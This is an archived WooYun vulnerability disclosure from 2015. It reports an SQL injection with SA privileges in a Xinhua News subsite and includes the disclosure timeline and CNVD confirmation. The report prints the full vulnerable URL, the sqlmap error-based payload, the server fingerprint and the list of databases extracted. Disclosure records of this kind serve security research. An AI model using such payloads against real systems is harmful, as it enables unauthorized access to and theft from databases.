乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-18: 细节已通知厂商并且等待厂商处理中 2015-03-23: 厂商已经确认,细节仅向厂商公开 2015-04-02: 细节向核心白帽子及相关领域专家公开 2015-04-12: 细节向普通白帽子公开 2015-04-22: 细节向实习白帽子公开 2015-05-07: 细节向公众公开
新华网某分站SA权限注射,站库分离,SA权限,可执行系统命令。 地址:http://mis.xinhuanet.com/sxtv2/index/inc/info/info.asp?tid={9E563755-C612-4ECF-A390-B9574DBFB604}
GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection points with a total of 57 HTTP(s) requests: --- Place: GET Parameter: tid Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: tid={9E563755-C612-4ECF-A390-B9574DBFB604}' AND 7651=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(103)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (7651=7651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(100)+CHAR(100)+CHAR(113))) AND 'yMsb'='yMsb --- [04:35:01] [INFO] testing Microsoft SQL Server [04:35:02] [INFO] confirming Microsoft SQL Server [04:35:04] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2008
数据库列表:
[04:43:22] [INFO] the SQL query used returns 12 entries [04:43:25] [INFO] retrieved: fininfo [04:43:25] [INFO] retrieved: macro_data [04:43:29] [INFO] retrieved: master [04:43:33] [INFO] retrieved: model [04:43:33] [INFO] retrieved: msdb [04:43:33] [INFO] retrieved: oa [04:43:34] [INFO] retrieved: Port_XH [04:43:34] [INFO] retrieved: ReportServer [04:43:34] [INFO] retrieved: ReportServerTempDB [04:43:35] [INFO] retrieved: shuju [04:43:35] [INFO] retrieved: tempdb [04:43:36] [INFO] retrieved: xhs available databases [12]: [*] fininfo [*] macro_data [*] master [*] model [*] msdb [*] oa [*] Port_XH [*] ReportServer [*] ReportServerTempDB [*] shuju [*] tempdb [*] xhs
执行命令:
过滤
危害等级:高
漏洞Rank:11
确认时间:2015-03-23 09:31
CNVD确认所述情况,已转由CNCERT向相关部门通报。
暂无